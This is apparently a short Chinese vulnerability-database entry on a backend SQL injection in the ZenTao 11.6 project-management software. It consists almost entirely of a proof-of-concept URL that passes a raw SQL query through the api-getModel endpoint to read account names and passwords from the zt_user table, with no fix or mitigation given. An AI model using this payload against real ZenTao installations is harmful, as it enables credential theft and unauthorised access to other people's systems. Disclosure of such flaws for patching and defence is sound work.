—
title: ‘禅道11.6后台SQL注入’
date: Thu, 17 Sep 2020 01:28:13 +0000
draft: false
tags: [‘白阁-漏洞库’]
—
### 影响范围
禅道 11.6
### 漏洞POC
Payload:
http://127.0.0.1/zentaopms/www/api-getModel-api-sql-sql=select+account,password+from+zt_user

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END













请登录后查看评论内容